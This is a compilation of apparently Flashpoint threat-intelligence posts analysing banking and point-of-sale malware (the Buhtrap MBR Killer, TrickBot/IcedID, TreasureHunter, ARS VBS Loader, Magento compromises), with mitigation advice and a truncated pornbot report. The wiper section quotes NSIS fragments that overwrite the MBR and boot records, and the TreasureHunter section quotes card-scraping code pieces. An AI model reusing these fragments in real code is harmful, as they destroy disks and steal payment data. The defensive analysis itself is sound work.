Banco de Chile ‘MBR Killler’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks

Wiper malware that may have destroyed as many as 9,000 workstations and 500 servers inside the Banco de Chile in a late-May attack has similarities to the Buhtrap malware component known as MBR Killer, leaked to the underground in February 2016.

Analysts at Flashpoint reverse-engineered the identified malware linked to the May 24 attack against the country’s largest financial institution, and said the malware is a modified version of a MBR Killer module known as kill_os. MBR Killer infections render the local operating system and the Master Boot Record unreadable.

According to bank officials, however, the wiper malware was just cover for a deeper attack against endpoints handling sensitive transactions and messaging over the SWIFT network. The SWIFT banking network, or the Society for Worldwide Interbank Financial Telecommunication, is the primary means of secure, reliable communications and money transfers between financial institutions.

On Sunday, Banco de Chile general manager Eduardo Ebensperger said in a statement that customer accounts were not affected, but critical processes such as branch services and telephone banking were impacted, as were executive offices and cashier personnel. Ebensperger told Chilean media outlet Pulso that $10 million was stolen and the stolen funds were filtered to entities in Hong Kong. He added that a forensic analysis conducted by Microsoft concluded this was an “international attack” and attributed it to either Eastern European or Asian groups.

Buhtrap malware and its components, including MBR Killer, were previously used in attacks against multiple Russian financial institutions, resulting in losses of 97 million rubles, or $1.23 million USD. The attacks in Russia forced one bank to disconnect from the Russian electronic payment system.

The attack in Chile comes on the heels of incidents affecting several banks in Mexico that use its Sistema de Pagos Electrónicos Interbancarios (SPEI) interbank transfer system, resulting in approximately $15.4 million USD in losses. In January, Flashpoint was aware of a separate malware attack targeting Mexican financial institutions that followed a pattern similar to previous attacks, with possible attribution to North Korean malware. Flashpoint was not able to analyze the malware targeting Mexican financial institutions, though the FBI associated the attack with North Korean malware. A report from El Financiero, a Mexican financial publication, following the January incident identified the attack as “FALLCHILL,” a North Korean remote administration tool (RAT) targeting aerospace, telecommunications, and financial organizations.

At this time, there does not appear to be a connection between attacks against Mexico’s banking institutions and the purported attack on Banco de Chile because the tactics, techniques, and procedures (TTP) used by the threat actors differ.

The similarities between the malicious code used in Chile and the leaked code from 2016 are in the use of the same NSIS script, below, in both instances. NSIS, or Nullsoft Scriptable Install System, is an open source system used to build Windows installers.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

By and large, the Buhtrap malware is complex and includes more than a dozen modules that give attackers the capability to install more malicious code, retain remote control over a compromised machine, and steal credentials among others. A list of available modules follows:

• “BHO”: a module designed to intercept and replace pages in the Internet Explorer browser.

• “kill_os”: a module designed to erase the MBR.

• “Loaders”: builders of NSIS scripts designed to install malware.

• “Mimimod”: a modified version of the “Mimikatz” program, used to obtain user credentials in the system.

• “ID”: an algorithm for obtaining the unique number of the infected machine.

• “BSShide”: a module designed to hide payment orders in the Business Support Systems (BSS). It modifies the page displayed to the user. SWIFT is part of the BSS.

• “Antidetekt”: a module designed to detect virtual environments and “sandboxes.”

• “UAC”: a module to bypass the User Account Control (UAC) protection.

• “RDP”: modifies the OS for the potential simultaneous operation of several users in the system.

• “VNC”: remote PC control with backconnect.

• “DLL Side-Loading”: used to install a keylogger and to provide communication with the control panel. Enables installation and operation of other modules in the system.

• “Control panel”: used to maintain visibility into infections and install additional modules to the infected host.

• “Builder”: a program designed to collect Trojan modules in one executable file.

• “MWI”: a collection of exploits, part of the “Microsoft Word Intruder” tool that was available on underground.

The Banco de Chile MBR Killer was also packed with VMProtect, meant to protect against forensic analysis and reverse engineering. Notably, the malware does not target victims based on locale or language; however, a Spanish language and locale check is present in the malware. The attribution behind the Banco de Chile attack remains uncertain; it is unclear if this code was simply reused by a copycat group or linked to the original group behind the Buhtrap malware. Originally, the kill_os module was leveraged to hide the evidence of successful bank network penetrations.

Banco De Chile: Malware Technical Analysis

The malware is packed with VMProtect/NSIS, and is executed via the System.dll in %TEMP%.

I. Main loop CreateFile API accessing \.PHYSICALDRIVE0:

Function main_loop_CreateFile
IntFmt $1 “\.PHYSICALDRIVE%D” $0
Push $0
StrCpy $0 $1
Pop $0

II. Master boot record setup:

‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i2) i’

III.MBR logical block addressing:

‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i2) i’

IV. Volume boot record NTFS:

‘(&i3, &i8, &i2, &i1, &i2, &i24, &i8, &i8, &i8, &i4) i’

V. Process NTFS boot:

Overwrite MBR
Overwrite Master File Table (MFT) mirror
Overwrite Volume Boot Record (VBR) mirror
Overwrite Extended Boot Record (EBR)
The following system API calls are used to overwrite the system:

${ForEach} $7 1 ${OVERWRITE_COUNT} + 1
System::Call “kernel32::SETFILEPOINTER(i, i, *p ,i) i (r2, r4, r3, ${FILE_BEGIN}) .r8”
${If} $8 <> -1
System::Call “kernel32::WRITEFILE(i, i, i, p, i) i (r2, r5, r9, r6, ${NULL})”
System::Call “kernel32::FlushFileBuffers(i) i (r2)”

VI. Process protection malware from shutdown:

System::Call “KERNEL32::GETMODULEHANDLE(t) p (‘ntdll.dll’) .r0”
${If} $0 <> ${NULL}
System::Call “KERNEL32::GETPROCADDRESS(p, t) p (r0, ‘ZwClose’) .r1”
${If} $1 <> ${NULL}
System::Call “KERNEL32::VIRTUALPROTECT(p, i, i, *i) i (r1, 6, ${PAGE_EXECUTE_READWRITE}, .r2) .r0”
${If} $0 <> 0
System::Alloc 6
pop $3
System::Call “NTDLL::MEMCPY(p, p ,i) i (r3, r1, 6)”
System::Call “NTDLL::MEMCPY(p, t, i) i (r1, t ‘1′, 6)”
System::Call “KERNEL32::CLOSEHANDLE(i) i (0x12345678) .r4”
System::Call “NTDLL::MEMCPY(p, p, i) i (r1, r3, 6)”
System::Free $3

VII. System shutdown instruction:

Push $1
Pop $1

Possible action:

As the MBR Killer codebase was identical with minor modification to the Buhtrap simple MBR Killer, reviewing any mitigation against the Buhtrap malware might assist with mitigation exposure to this threat.
Review and mitigate for any malware execution from %TEMP% directory specifically if it calls “System.dll.”

To download the MBR Killer indicators of compromise (IOCs), click here.

The post Banco de Chile ‘MBR Killler’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Targeting Popular Job Recruitment Portals About More Than PII

Job listing and recruitment portals have been an attraction for cybercriminals given the volume of personal information uploaded to those sites in the form of resumes, cover letters and other data specific to individuals.

But there’s more to criminals’ interest than just stealing personally identifiable information. Security shortcomings on some of these sites can expose job applicants, business account holders and the recruiters themselves to a number of different threats. For example, when threat actors gain access to legitimate business accounts at recruiting sites they can use social engineering to con job seekers into replying to phony listings and are inadvertently recruited as money mules, or are lured into money laundering operations. Malicious documents in the guise of a PDF’d application can also slip past lax or non-existent scanning tools and target the recruitment portal directly, or enable an attacker access to data stored on the portal and expose applicants to identity theft.

Flashpoint analysts have noticed a marginal increase in the number of mentions on Deep & Dark Web forums related to such activity around recruitment portals, many of which involve advertisements for the availability of compromised accounts, or criminals soliciting business accounts in order to list jobs on the platforms. Attackers want access to business accounts in order to leverage their phony job listings and recruit people who would ultimately participate in fraud without their knowledge.

It’s likely that most of the recruitment portals are either unaware of such activity, or hesitant to disclose it, meaning that analysts may not have a true handle on the full scope of the problem. Given the increasing number of mentions and interest in abusing these platforms, threat actors may find this to be a useful tactic going forward.

The recruitment of unwitting mules is a growing problem on a number of online platforms that accept classified ads, but most prominently on job recruitment portals. Desperate for employment, a candidate may think they’re applying for a legitimate position. In actuality, the nonexistent positions—typically for merchandise handlers or payment processors—are a means of recruiting unwitting applicants into performing activity that facilitates fraud schemes, such as money laundering, by receiving unauthorized transfers of funds and sending the funds on to other recipients, typically for a nominal fee, frequently 10% of the amount they receive. The applicants are likely to believe the position is more credible if it is posted by a reputable company on a popular recruitment platform.

The phony job solicitations are professionally written and appear legitimate to casual observers and at times to the actual business, who may have numerous satellite campuses and could be unaware of where a local office or contractor could be listing a job.

When it comes to targeting recruitment professionals, Flashpoint analysts have observed that threat actors typically target such employees via email phishing campaigns, rather than attack the recruitment portals given the continued relevant success of phishing schemes. Credential stuffing, or account checking attacks, are more viable when targeting recruitment portal accounts. Credential stuffing attacks leverage the hundreds of millions of breached and leaked credentials available on the Deep & Dark Web (DDW) and the surface web to gain unauthorized access to accounts. Attackers use automated login requests to repeatedly try username-password combinations until they gain access to an account; it’s a tactic that could have its advantages over using malware-laced PDF documents that may never be downloaded, or could be flagged by a scanner.

Job recruitment portals are a warehouse of personal information, and by successfully compromising an applicant’s or recruiter’s account, criminals are able to harvest applicants’ PII, execute social engineering attacks that lead to identity theft, or recruit unwitting mules for fraud.

Flashpoint recommends the following mitigation advice for recruiters and platforms:

• Recruiters should always utilize the document parsers that many recruitment platforms have to avoid being infected by malicious documents.

• Recruiters should enforce employees’ usage of the recruitment platforms, rather than passing around PDF resumes and cover letters

• Require proper document virus scanning

• Secure accounts with unique passwords and two-factor authentication in order to deter account takeover.

• Recruiters should work with internal security teams to do cursory research across recruitment sites for fraudulent listings

• Recruitment portals should implement various security checks that analyze malicious documents and URLs for malicious activity.

• Recruitment portals should always advise users of the risk of accepting third-party documents.

The post Targeting Popular Job Recruitment Portals About More Than PII appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trickbot and IcedID Botnet Operators Collaborate to Increase Impact

Different banking malware operations previously competed for victims, often seeking out and uninstalling one another upon compromising machines; for example, the SpyEye malware would uninstall Zeus upon infection. Now, in what may indicate a shift toward more collaboration among cybercrime groups, the operators of the IcedID and TrickBot banking Trojans appear to have partnered and are likely sharing profits, based on operation details.

The clincher came when analysts at Flashpoint recently examined samples that indicate computers infected with IcedID are also downloading Trickbot, a prolific piece of malware considered to be the successor to the Dyre banking Trojan.

Researchers first spotted IcedID in November 2017; IBM’s X-Force research team published a report claiming to have spotted spotted this new banking malware spreading via massive spam campaigns. Compromised computers were first infected with the Emotet downloader, which then grabbed IcedID from the attacker’s domain; the Russian-speaking cybercriminals behind Emotet are believed to be comprised of some of the operators of the Dridex banking Trojan. IcedID is able to maintain persistence on infected machines, and it has targeted companies mainly in the financial services, retail, and technology sectors.

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

It appears that attackers now send IcedID directly as spam, and that piece of malware acts as a downloader that installs TrickBot, which in turn installs other modules on victims’ machines.

While it is typically unusual to find two different malware families infecting the same machine, Flashpoint analysts have determined through source intelligence with knowledge of both parties’ operations that there are indications of extensive collaboration between these two fraud operators. Human fraudsters are central to this cybercrime model; the TrickBot operators, for example, leverage automated attacks and knowledgeable fraud operators who review compromised data from victims’ machines and can carry out real-time account takeover (ATO) operations.

Trickbot and IcedID Fraud Master Collaboration: Monetization Funnel

Even the most sophisticated cybercriminal organization cannot reap financial rewards without the human resources required to cash out victims’ bank accounts. Cybercriminals’ ability to profit from the products and services involved in financial fraud rests on the availability of fraud masters, money mules, and related services.

The TrickBot and IcedID collaboration gives this pairing significant capabilities. First, the attacks are complex; while the malware’s main capabilities are its use of token grabbers, redirection attacks, and webinjects to steal banking credentials, there are other modules at the operators’ disposal that allow them to have deep coverage of a victim’s machine and expand the breadth and scope of an attack, thereby allowing them to derive additional potential sources of profit from a successful compromise.

Key to this complete coverage is the ability to carry out account checking, or credential stuffing, in order to determine the value of a victim’s machine and their access. Attackers can leverage higher value targets for network penetration, for example, while attackers can use other compromised targets for cryptocurrency mining.

IcedID has been in the wild since April 2017 and was originally known as BokBot; this malware is exclusively a threat to Windows. Emotet was associated with this malware, and operators used it mainly as a loader and to maintain persistence in order to install and execute additional malware, including a virtual network computing (VNC) module for remote management and an antimalware bypass module. IcedID creates proxies that are used to steal credentials for a host of websites that are mainly in financial services, though some sites also correspond to the retail and technology sector. The local proxy intercepts traffic and uses a webinject that steals login data from the victim.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

TrickBot targets victims in a wide swathe of industries by leveraging multiple modules, including leaked exploits, and targets victims for various malicious activities, such as cryptocurrency mining and ATO operations.

Central Command

Linguistic analysis and an investigation into TrickBot and IcedID botnet operations reveals that the campaign involving a botnet belongs to a small group that commissions or buys the banking malware, manages the flow of infections, makes payments to the project’s affiliates (traffic herders, webmasters, mule handlers), and receives the laundered proceeds. Flashpoint assesses with high confidence that a head of operations likely oversees a complex network of actors who likely know each other only by aliases even after years of working together. Each segment of the ecosystem, the so-called affiliates, are specialists within their respective domains. While they are delivering value to the botnet owner, they act independently, employing their own closed networks to accomplish assigned tasks. The organizational complexity of these projects, along with the stringent security practices exercised by everyone throughout the supply chain, poses a significant challenge to investigations.

Role of Botmaster in Cybercrime Operations

The responsibility to monitor the botnet, or the sum total of all victims’ online activities, falls on the TrickBot and IcedID botmaster. A bot’s activity is recorded in the command-and-control (C2) database according to the parameters specified in the control panel’s preferences. The botmaster also accepts XMPP or Jabber notifications via the “jabber_on” field in the backend when the victims log in to the banking page of interest. The botmaster then provides a message for the fraud masters once the login is recorded. The message reads, “Try to log in with: Login AND passcode: at this url: <bank_login_url.”

The botmaster may elect to receive notifications when a victim accesses only certain online banking applications. If, for example, the project is built around European or US financial institutions (possibly because that is where the syndicate’s money laundering capabilities are focused), they would receive Jabber notifications based on their geographical cash out preference.

The botmaster decodes the logs and parses them for the needed content. Exported logs may contain tens of millions of lines of data, so a botmaster will likely employ a parsing application to extract the relevant data. Advanced banking Trojans such as Citadel have a built-in log parser. Once information consisting of the victim’s login credentials, answers to the secret questions, and email address is extracted from the logs, it is passed on to an affiliate who manages real-world operations.

Geographical disparity presents an obstacle in monetizing access, though this issue is typically solved through the use of money mule (or drop) services. Mules open bank accounts in the geographic location of the victim and at the same financial institution. They receive fraudulent account clearing house (ACH) and wire transfers into their account and forward the proceeds to the botnet owner or the intermediary. Higher up the chain, mule handlers direct mule recruiting and money laundering activities at a range of locations and financial institutions; many mule handlers advertise their services on the cybercrime forums.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Based on the close collaboration between TrickBot and IcedID operators and their shared backend infrastructure, it is likely that the operators will likely continue to closely collaborate on cashing out stolen accounts.

Such collaboration may also signal that fraud masters and malware developers are continuing to foster collaborative fraud operations targeting corporations in an attempt to bypass the latest anti-fraud measures.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Attachments and Downloads

To download the Indicators of Compromise (IOCs) for TrickBot and IcedID, click here.

To download the Snort rule, click here.

The post Trickbot and IcedID Botnet Operators Collaborate to Increase Impact appeared first on Flashpoint.

Go to Source
Author: Flashpoint

TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked

The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.

The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.

Point-of-sale malware has been at the root of many breaches, including massive thefts at retailers Target in 2013 and Home Depot in 2014; in each case attackers were able to extract more than 100 million payment card and customer records from point-of-sale terminals by scraping card data before it was encrypted and sent to the payment processor. Both retail giants paid tens of millions of dollars in settlements, and in Target’s case, its chief executive officer resigned his position.

Industry Collaboration on Detection and Prevention

TreasureHunter has been known and investigated since 2014, but until now investigators have had to reverse-engineer its code in order to analyze it. Now with the full code available, analysts have previously unseen insight into the malware’s operation. Flashpoint analysts, who discovered the source code leak in March, proactively collaborated with researchers at Cisco Talos, who reviewed and improved protections, and advanced-detection mechanisms, in an effort to disrupt potential copycats who may have their hands on the source code.

In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code. Notably, the original developer appears to be a Russian speaker who is proficient in English. Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.

A graphical representation of a typical cybercrime dump shop ecosystem.

Image 1: A graphical representation of a typical cybercrime dump shop ecosystem.

One Leak Can Spawn Many Variants

TreasureHunter behaves like many other point-of-sale malware samples. Once an attacker has access to a Windows-based server and the point-of-sale terminal, the malware is installed and it establishes persistence by creating a registry key that runs the malware at startup. It then enumerates running processes, and scans device memory looking for track data, including primary account numbers (PANs), separators, service codes, and more. It then establishes a connection with the attacker’s command and control server and sends the stolen data to the criminal.

The leak of the builder adds another dimension to the availability of the TreasureHunter payload and configurations. In the past, malware source code leaks such as the Zeus banking Trojan have spawned numerous variants, including Citadel, which cost organizations hundreds of millions in losses. PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware which led to the creation of the ProPoS and Katrina variants. The actor behind the TreasureHunter leak said:

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs ( not at a very high rate, but it still does ) and besides that , since now you have the source code, it can be update anytime for your own needs.”

For researchers, the availability of the source code opens the door into new avenues of analysis and proactive visibility into such activity on the underground. This affords organizations such as Flashpoint the ability to collaborate with others in the industry such as Cisco Talos in this case to improve existing protections and force attackers back to the drawing board.

Source-Code Level Insight

The code project appears to be called internally trhutt34C, and was written in pure C with no C++ features. It was compiled originally in Visual Studio 2013 on Windows XP. Based on analysis, researchers believe the developer intended to improve and redesign various features including anti-debugging, code structure improvement, and gate communication logic. With the goal of additional features to be improved, the developer hoped frustrate malware analysis and subsequent research; the actor left behind a note that said: “We want the malware researchers screamin’!”

A snapshot of the TreasureHunter source code.

Image 2: A snapshot of the TreasureHunter source code.

The unfinished project included continued improvement code snippets, below:

  • TO DO for the next version of the client (0.2 Beta):
    • Replace all Unicode versions of functions with ANSI versions. Now why did I ever go for wide-char in the first place?..
  • Improve the code structure:
    • Replace all the if – else constructs that are rendered needless by return commands;
    • Organize the includes;
    • Give the code proper commenting so that I am able to modify and improve it after not having seen it for some time (if such a thing happens).
    • Make scan exceptions and service codes configurable.
    • Add the following commands to the gate communication logic:
    • Download and execute for updating;
    • Remote CMD command execution;
    • Remote self-removal for emergency cases.
    • Add anti-debugging:
      • Use self-debugging by creating a child process (may be improved later by reversing the tables);
      • Improve the MD5 function and use it to find debuggers by signatures (maybe to be added in future versions);
      • Use GetTickCount to detect parts of code being stepped through (maybe to be added in a “heuristical” joint algorithm with the abovementioned);
      • Upon finding a debugger, destroy the critical section and/or start creating new threads infinitely until the application crashes.
      • Maybe also kill processes and delete debuggers and/or decompilers permanently. We want the malware researchers screamin’!
  • Add better persistency and timeouts to gate communication.
  • Add local saving of data if the gate can’t be reached for a certain period of time.
  • Add the option to run the program as a service on Windows XP.
  • Improve the code structure and add comments to avoid future confusion.
  • Add error handling and backup restart in case of crash or heap overflow (malloc fail).
  • Improve the Clingfish system (so that a clingfish thread doesn’t do the same thing as the main thread right after being spawned).
  • Debug the system information extraction mechanism further (on different OS versions).
  • Improve the track-finding algorithm to make it faster.

The stolen dump structure is as follows. The structure contains the following key elements used to collect and operate with stolen dumps, such as unique machine information and where scraped data is from:

typedef struct dumpsHolder {
TCHAR *lpFileName;
int lpFileNameLength;
int procID;
char *trackArr;
int trackArrLength;
} dumpsHolder;

The credit card process scan works in exception mode:

char *scanExceptions[SCANEXCEPTIONSNUM] = {“System32”, “SysWOW64”, “\Windows\explorer.exe”};

The malware focuses on scraping credit card track data, focusing on the following service codes:

char *serviceCodes[SERVICECODESNUM] = {“101”, “201”, “121”, “231”, “221”, “110”};

Registry persistence for autostart in HKLMMicrosoftWindowsCurrentVersionRun runs as “jucheck.”

A registry key created by the malware for persistence

Image 3: A registry key created by the malware for persistence.

The source code is consistent with the various samples that have been seen in the wild over the last few years. TreasureHunterconfig.h shows definite signs of modification over the lifespan of the malware. Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER to be overwritten by the builder. More recent samples, and the source code, instead writes useful config values directly into the fields. This makes the samples slightly smaller and uses fresh compiles to create reconfigured files.

The post TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked appeared first on Flashpoint.

Go to Source
Author: Flashpoint

RAT Gone Rogue: Meet ARS VBS Loader

Malicious VBScript has long been a fixture of spam and phishing campaigns, but until recently its functionality has been limited to downloading malware from an attacker-controlled server and executing it on a compromised computer.

Researchers at Flashpoint have seen and analyzed a unique departure from this norm in ARS VBS Loader, a spin-off of a popular downloader called SafeLoader VBS that was sold and eventually leaked in 2015 on Russian crimeware forums.

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious “loaders”, i.e. initial infection vector malware families used to install subsequent payloads.

Image 1: ARS VBS Loader's administrative login portal.

Image 1: ARS VBS Loader’s administrative login portal.

The new loader has been spammed out in email attachments enticing victims with lures in subject lines related to personal banking, package shipments, and toll road notifications. Should a victim interact with the attachment and launch it, analysts say numerous types of commodity malware could be installed, including the AZORult information-stealing malware. AZORult was also used in campaigns targeting more than 1,000 Magento admin panels; in those attacks, the malware was used to scrape payment card information from sites running the popular free and open source ecommerce platform.

ARS VBS Loader targets only Windows machines and supports Windows 10, according to posts to a Russian-speaking forum going back to December. Previously, another loader called FUD ASPC Loader, first advertised in May 2017, contained similar functionality but not Windows 10 support.

The loader is also likely to side-step detection by signature-based antivirus and intrusion detection systems because of the relative ease in which attackers can obfuscate VBScript, Flashpoint analysts said. Obfuscation through a variety of means allows attackers to hide malware; if the malware is obfuscated with encryption or packing, it’s exponentially more difficult for antivirus to sniff out malicious code, for example.

Once the ARS VBS Loader executes on a victim’s computer, it immediately creates a number of entries in nearly a dozen autorun locations, including registry, scheduled tasks, and the startup folder, ensuring persistence through reboots. ARS VBS Loader will connect to the attacker’s server, sending it system information such as the operating system version name, computer user name, RAM, processor and graphics card information, a randomly generated ID for infection tracking, and machine architecture information.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

The botmaster, meanwhile, can remotely administer commands to bots through the PHP command-and-control application. Communication with the command-and-control server is carried out in plaintext over HTTP, making it easy to spot, Flashpoint analysts said.
The malicious code that runs on the victim’s machine is written entirely in VBScript and contains functionality for updating and deleting itself, and deploying plugins such as a credentials stealer, or launching application-layer denial-of-service (DoS) attacks against websites, and loading additional malware from external websites.

The most common command spotted by analysts is download, which instructs bots to download and execute malware from a supplied URL. There is also the plugin command where plugins that steal passwords or capture desktop screenshots can be pushed to compromised computers.

The DDoS command is also noteworthy because it’s a unique capability; analysts said they have not seen this command used in the wild. The command tells bots to send a specified amount of HTTP POST requests to a particular URL. Since this is a simple application layer flooding attack, it is currently unknown how successful this attack would be against targets in the wild, analysts said, adding that it would be easy to spot such traffic because the same hardcoded POST values are sent in the HTTP flood.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Analysts caution that users should be vigilant about not opening email attachments from unknown sources, and that it’s likely ARS VBS Loader will continue to be an effective initial infection vector for spam campaigns.

To download the indicators of compromise (IOCs) for the ARS VBS Loader, click here.

To download the Yara rule for the ARS VBS Loader, click here.

The post RAT Gone Rogue: Meet ARS VBS Loader appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Compromised Magento Sites Delivering Malware

Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.

Researchers at Flashpoint are aware of the compromise of at least 1,000 Magento admin panels, and said that interest in the platform has continued unabated on entry-level and top-tier Deep & Dark Web forums since 2016. Attackers have also demonstrated continued interest in other popular ecommerce-processing content management systems such as Powerfront CMS and OpenCart.

The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials. Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access of the panels.

Once the attacker has control of the site’s Magento CMS admin panel, they have unfettered access to the site and the ability to add any script they choose. In this case, the attackers were injecting malicious code in the Magento core file, allowing them access to pages where payment data is processed. POST requests to the server containing sensitive data are then intercepted and redirected to the attacker.

Flashpoint analysts said the compromised sites return an exploit in the form of a phony Adobe Flash Player update, which if launched by the user runs malicious JavaScript that downloads malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner. The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.

Image 1: Anatomy of the attack.

Image 1: Anatomy of the attack.

Flashpoint said that most of the victims among the 1,000 panels it is aware of are in the education and healthcare industries, and that the IP addresses of the compromised panels map to locations in the United States and Europe.

Analysts assess that this is likely only a set of a larger sample of compromised Magento panels.

Flashpoint is working with law enforcement to notify victims of these compromises.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

In the meantime, the rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords. The compromised IoT devices were corralled into a massive botnet that was pointed at a number of high-value targets including DNS provider Dyn, French webhost OVH, and journalist Brian Krebs’ website in order to carry out crippling distributed denial-of-service attacks. The DDoS attack against Dyn peaked at 1 terabyte-per-second and took a number of popular websites and services offline for the better part of day in October 2016, including Twitter, Spotify and GitHub.

Magento admins are advised to review CMS account logins and mitigate their exposure to brute-force attacks by enforcing the following password-hygiene practices:

  • Enforce organizational password complexity requirements.
  • Restrict users from recycling previously used passwords.
  • Enable two-factor authentication for sensitive systems, applications, databases, and remote access solutions.
  • Supply users with secure password managers to assist with password requirements.

The indicators of compromise (IOCs) for AZORult, Rarog, and the campaign targeting Magento are available for download here. The Yara rule is available for download here.

The post Compromised Magento Sites Delivering Malware appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Inside a Twitter ‘Pornbot’ Campaign

Flashpoint analysts recently investigated the trend of adult entertainment-themed Twitter bots known as pornbots, which post tweets with hashtags containing popular brand names alongside random, unrelated terms. The observed set of pornbots appears to be a mix of compromised accounts and accounts specifically created to advertise pornography. As such, organizations mentioned in these bots’ pornographic advertising campaigns on Twitter may suffer reputational damage in addition to distorted social media engagement campaign metrics.

Image 1: Sample of tweets containing brand hashtags and random terms. Brand names have been sanitized

Image 1: Sample of tweets containing brand hashtags and random terms. Brand names have been sanitized.

In recent years, Twitter has become a primary form of external, two-way communication and engagement for organizations across all sectors. For example, companies often use hashtags to monitor the spread and reception of marketing campaigns and sponsored events. More crucially, emergency services may use hashtag tracking to gain real-time insight into current situations during natural disasters and other crises. In a worst-case scenario, pornbots or other spambots could identify a trending hashtag and distort the conversation by sharing unrelated or false information.

Image 2: Three sample pornbot Twitter accounts using the same profile picture. Each pornbot has a different username, bio, and join date, and each bio contains a link to a different adult entertainment website. However, these adult entertainment websites were hosted on common servers.

Image 2: Three sample pornbot Twitter accounts using the same profile picture. Each pornbot has a different username, bio, and join date, and each bio contains a link to a different adult entertainment website. However, these adult entertainment websites were hosted on common servers.

Flashpoint analysts identified three distinct sets of pornbots using identical hashtags, indicating they were likely part of the same organized campaign. While similar in appearance and often using a common set of profile pictures across the groups, each promoted a different adult website. However, the three adult websites linked to the sample profiles shown above were hosted on one of two common servers, which may indicate the pornbots share a common origin. Flashpoint analysts did not detect any malicious files on the servers hosting the websites advertised by the pornbots.

Advertising Methods

Flashpoint analysts observed two primary methods of advertising across the pornbot accounts:

• Hashtagged tweets: The first advertising method utilized hashtags followed by random risqué buzzwords and a link to an adult dating or video website, often featuring online “cam girls” or escort services.

• Link in bio and pinned tweet: The second advertising method includes multiple accounts sharing similar bios and pinned tweets, which contain links to adult content sites.

Image 3: Example of the first method of advertising adult entertainment sites, whereby links are included within hashtagged tweets.

Image 3: Example of the first method of advertising adult entertainment sites, whereby links are included within hashtagged tweets.

 Image 4: Example of a pornbot account using the second advertising method, whereby links to adult websites are included in the bio and the pinned tweet.

Image 4: Example of a pornbot account using the second advertising method, whereby links to adult websites are included in the bio and the pinned tweet.

Identifying Pornbots

Image 5: Sample guide to identifying pornbots and spambots.

Image 5: Sample guide to identifying pornbots and spambots.

Over the course of their investigation, Flashpoint analysts noted several common traits that can be used to identify pornbots and other spambots:

• Reused profile images: The profile pictures used by the observed pornbots were all obtained from public profiles on open-source websites, primarily Instagram and Pinterest. Reverse searches using Google Images indicated these stolen images were resused by multiple pornbots.

